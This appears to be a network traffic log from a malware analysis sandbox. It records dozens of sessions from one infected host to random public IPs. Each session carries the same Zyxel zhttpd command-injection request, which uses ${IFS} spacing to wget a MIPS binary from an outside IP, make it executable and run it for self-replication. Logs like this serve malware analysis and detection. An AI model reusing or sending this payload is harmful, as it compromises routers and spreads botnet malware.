                                                  Jan 19, 2024 18:23:41.758636951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1063192.168.2.1357632156.51.55.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758692026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1064192.168.2.134338499.185.90.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758717060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1065192.168.2.1344462197.171.184.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758750916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1066192.168.2.1346546131.147.81.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758781910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1067192.168.2.1334704188.101.40.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758821011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1068192.168.2.1336472148.98.203.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758948088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1069192.168.2.133457893.175.251.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758992910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1070192.168.2.134645637.251.226.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759035110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1071192.168.2.1336362137.249.202.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759062052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1072192.168.2.1349972206.4.202.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759097099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1073192.168.2.134845245.122.207.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759155035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1074192.168.2.1356754181.46.142.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759186983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1075192.168.2.1350332111.171.131.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759232998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1076192.168.2.1337660195.151.77.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759285927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1077192.168.2.1356546141.236.96.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759320021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1078192.168.2.135820823.135.19.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759368896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1079192.168.2.133667227.83.220.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759418011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1080192.168.2.134149254.235.111.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759469986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1081192.168.2.136070476.88.189.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759500027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1082192.168.2.133288253.173.65.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759547949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1083192.168.2.135210096.111.151.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759596109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1084192.168.2.1360868121.207.150.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759620905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1085192.168.2.135426865.77.69.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759677887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1086192.168.2.1340708200.11.36.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759735107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1087192.168.2.1359712172.243.14.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759773016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1088192.168.2.134880425.17.210.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759792089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1089192.168.2.134985851.223.193.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759829998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1090192.168.2.1353208217.116.68.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759872913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1091192.168.2.1350112181.73.55.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759927034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1092192.168.2.1358938135.210.227.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759962082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1093192.168.2.135332249.109.33.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.759994984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1094192.168.2.1355452150.120.52.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.760055065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1095192.168.2.133875442.185.31.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.760113955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1096192.168.2.1335444175.123.122.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.760153055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1097192.168.2.134953670.146.101.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.760171890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1098192.168.2.1339448216.164.141.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.760224104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1099192.168.2.134990660.123.235.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.760252953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1100192.168.2.136075065.184.212.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.760277033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1101192.168.2.1358752141.92.124.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.760315895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1102192.168.2.133595281.70.31.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.760375977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1103192.168.2.134662041.0.244.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.760404110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1104192.168.2.136005874.78.108.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764455080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1105192.168.2.134984417.8.80.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764502048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1106192.168.2.1360704123.26.62.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764597893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1107192.168.2.134992653.12.70.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764601946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1108192.168.2.135640675.146.218.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764622927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1109192.168.2.134610047.162.233.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764684916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1110192.168.2.134861214.132.93.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764760017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1111192.168.2.133962631.255.91.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764792919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1112192.168.2.133379014.23.111.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764820099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1113192.168.2.1333536155.163.4.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764858961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1114192.168.2.1348686162.163.255.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764904022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1115192.168.2.1356140133.189.170.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.764947891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1116192.168.2.135488427.14.189.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765002012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1117192.168.2.133708440.242.241.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765036106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1118192.168.2.13328645.57.121.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765089989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1119192.168.2.135698859.33.12.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765120983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1120192.168.2.1334944153.88.98.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765167952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1121192.168.2.1349094133.92.154.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765192986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1122192.168.2.134048257.40.174.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765249014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1123192.168.2.1340392122.6.48.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765279055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1124192.168.2.1344106150.225.4.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.765306950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1125192.168.2.1359698135.56.174.221443
                                                  TimestampBytes transferredDirectionData
